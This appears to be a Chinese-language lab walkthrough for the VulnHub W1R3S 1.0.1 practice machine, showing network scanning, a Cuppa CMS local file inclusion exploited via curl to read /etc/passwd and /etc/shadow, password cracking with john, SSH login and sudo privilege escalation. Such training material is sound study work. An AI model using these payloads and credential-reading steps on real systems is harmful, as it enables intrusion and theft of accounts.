Vulhub W1R3S: 1.0.1靶机详解

项目地址

plain 复制代码
https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

实验过程

开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

plain 复制代码
nmap 192.168.47.1-254

根据对比可知W1R3S: 1.0.1的一个ip地址为192.168.47.172

扫描W1R3S: 1.0.1的操作系统,端口及对应服务

plain 复制代码
nmap -A -p- 192.168.47.172

发现该靶机开放了21,22,80,3306端口

目录扫描

plain 复制代码
dirb http://192.168.47.172

获取shell

访问网站

拼接访问目录扫描出的目录/administrator

这是一个数据库的安装创建,但不知道密码和数据库名

观察网页标题为Cuppa CMS

搜索一下它的历史漏洞

plain 复制代码
searchsploit cuppa
plain 复制代码
searchsploit -m php/webapps/25971.txt

文件中描述说,/alerts/alertConfigField.php文件urlConfig 参数存在 LFI 漏洞,可以利用特殊的 url ,查看本地文件

在网页上面进行尝试访问,发现没有回显结果

用curl 尝试看可不可以下载下来

plain 复制代码
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.47.172/administrator/alerts/alertConfigField.php

在文件中发现了 w1r3s 用户,用同样的方法获得存密码的shadow文件试试,发现了 rootwww-dataw1r3s用户的密码

plain 复制代码
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.47.172/administrator/alerts/alertConfigField.php

将密码存到一个文件中进行爆破

plain 复制代码
vim password.txt
cat password.txt
plain 复制代码
john password.txt

使用ssh进行远程连接,发现w1r3s用户连接成功

plain 复制代码
ssh [email protected]

提权

查看可执行的命令

plain 复制代码
sudo -l

发现是ALL

直接sudo su提权

提权成功

相关推荐
LaoZhangGong12322 分钟前
W5500使用ioLibrary库创建TCP客户端
网络·经验分享·stm32·网络协议·tcp/ip
麟城Lincoln1 小时前
【Linux笔记】nfs网络文件系统与autofs(nfsdata、autofs、autofs.conf、auto.master)
linux·网络·笔记·nfs·autofs
Funny-Boy1 小时前
Reactor (epoll实现基础)
服务器·网络·c++
tmacfrank2 小时前
Java 原生网络编程(BIO | NIO | Reactor 模式)
java·开发语言·网络
IP管家3 小时前
企业级IP代理解决方案:负载均衡与API接口集成实践
服务器·网络·数据库·网络协议·tcp/ip·容器·负载均衡
RockLiu@8054 小时前
自适应稀疏核卷积网络:一种高效灵活的图像处理方案
网络·图像处理·人工智能
{⌐■_■}4 小时前
【gRPC】HTTP/2协议,HTTP/1.x中线头阻塞问题由来,及HTTP/2中的解决方案,RPC、Protobuf、HTTP/2 的关系及核心知识点汇总
网络·网络协议·计算机网络·http·rpc·golang
Easy_Package5 小时前
Linux中的进程
linux·服务器·网络
网络空间小黑11 小时前
TCP/IP 知识体系
网络·网络协议·tcp/ip·计算机网络·5g·wireshark·信息与通信
Dotrust东信创智12 小时前
面向SDV的在环测试深度解析——仿真中间件SIL KIT应用篇
网络·中间件·汽车